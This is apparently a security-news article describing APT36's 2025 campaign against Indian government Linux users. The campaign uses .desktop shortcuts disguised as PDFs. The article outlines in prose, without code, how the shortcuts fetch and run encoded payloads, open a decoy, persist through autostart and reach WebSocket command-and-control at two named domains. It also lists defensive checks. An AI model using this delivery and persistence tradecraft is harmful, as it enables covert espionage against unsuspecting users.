APT36’s Sneaky Malware Campaign Targeting Linux Systems
APT36, also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major, is a Pakistan-linked cyber-espionage group that has spent more than a decade targeting Indian government, military, and diplomatic institutions. In August 2025, cybersecurity researchers from two security firms, Cyfirma and Cloudsek, revealed a new campaign relying on deception and persistence rather than cutting-edge exploits.
This operation uses Linux's everyday desktop shortcuts to deliver hidden malware, effectively disguising malicious actions as harmless user activity. The attack highlights how advanced groups increasingly focus on stealth and social engineering rather than brute-force technical tricks. By weaponizing something as ordinary as a desktop shortcut, APT36 manages to trick users into launching malware without realizing anything is wrong.
The campaign begins with phishing emails carrying ZIP archives that appear to contain legitimate documents. These archives contain files with names such as Meeting_Notice_Ltr_ID1543ops.pdf.desktop or PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop. To most users, these look like ordinary PDFs. In reality, they are not documents but .desktop files, shortcuts Linux systems use to launch applications.
When opened, the file executes a set of commands defined in its hidden configuration. These commands are designed to create a temporary file in the /tmp directory. Using a timestamp to avoid detection, malicious commands then fetch encoded payloads from attacker-controlled servers or cloud services like Google Drive. The payload is decoded, marked as executable, and launched. At the same time, a decoy PDF is opened in Firefox to reassure the user that they have indeed opened a regular file.
The attackers enhance the illusion by giving the file a PDF-style icon and instructing the system to run without showing a terminal window. They also configure the shortcut to run automatically whenever the user logs in. This means that once the user has been tricked into clicking, the malware remains active on the system indefinitely.
Once the malicious payload is running, it quickly checks whether it is being executed in a sandbox or debugged by security analysts. If it feels safe, it installs itself more firmly into the system by ensuring persistence through autostart settings. It then reaches out to its command-and-control servers, in some cases through domains such as seemysitelive[.]store or securestore[.]cv.
The communication relies on WebSocket connections, allowing the attacker to maintain a quiet, continuous control channel. APT36 threat actors can exfiltrate sensitive data, move further inside a network, or issue new commands through this channel. The design ensures attackers retain access and control once the initial deception succeeds without drawing evident attention.
What makes this approach particularly dangerous is how ordinary it looks from the victim's perspective. They see a document open in Firefox, and nothing unusual happens. In the background, malware has just been delivered, installed, and connected to a remote controller.
Deceptively Simple, but so Effective
APT36's strategy works because it builds on three strengths: familiarity, subtlety, and persistence. The familiarity comes from the naming and appearance of the files, which resemble routine government or business documents. The subtlety comes from how the malware hides its execution, avoiding visible windows and presenting a convincing decoy file to distract the user. The persistence lies in how the .desktop file ensures that the malicious code will run every time the system starts up, allowing the attackers to maintain long-term access.
The group also shows careful tailoring to its environment. By targeting BOSS Linux, a distribution commonly used in Indian government institutions, APT36 demonstrates a focused approach. Rather than casting a wide net, it designs its tools specifically for the systems its targets are most likely to run, significantly increasing its chances of success.
Researchers suggest several measures that organizations can take to reduce the risk of being victimized by such campaigns. At the network level, defenders can block access to known malicious domains like seemysitelive[.]store and securestore[.]cv, preventing infected systems from communicating with their controllers. On individual machines, administrators should regularly check for unusual .desktop files in login or autostart directories, particularly those that call Bash commands or contain encoded data.
Proactive monitoring can also help. Looking for temporary files with suspicious names, inspecting memory for unexpected binaries, or identifying active WebSocket processes can uncover infections that have already taken hold. Strengthening email security is equally essential: filtering ZIP attachments containing disguised .desktop files can stop many attacks before they reach vulnerable end users.
Perhaps most importantly, organizations need to raise awareness among their staff. Many cyberattacks succeed because people assume familiar icons and filenames can be trusted. Training users to be cautious about unexpected attachments, even those that appear to be PDFs, which are often perceived as inherently secure, can stop similar-styled attacks long before persistence is achieved.
APT36's campaign reminds us that cyber-espionage groups do not always need advanced exploits to succeed. Instead, they rely on careful planning, knowledge of their target environment, and subtle deception. Turning a standard feature of Linux into a delivery mechanism for malware demonstrates how even the most trusted parts of an operating system can be misused.
The lesson is equally clear for defenders. Security is not just about patching vulnerabilities but also about recognizing how ordinary tools can be repurposed for malicious ends. Vigilance, user education, and routine system checks are as critical as any firewall or antivirus product.
This campaign offers end users an important insight into how modern cyberattacks unfold. The threat does not always come from dramatic breaches or visible system crashes. Often, it arrives through a simple click on a file that looks entirely safe. Behind the scenes, attackers may already be in control.
APT36's use of disguised .desktop files shows that cyber-espionage can thrive on ordinary features and everyday trust. By staying alert, questioning unexpected attachments, and applying basic defensive measures, individuals and organizations can blunt the effectiveness of such campaigns. Cybersecurity is not only about technology; it is about awareness and habits. The attackers in this case succeeded by exploiting trust. Defenders can succeed by reinforcing vigilance.
Share:
Facebook
X.com
LinkedIn
Copy Link
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
DonatePCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.
Donate
▼ Show Discussion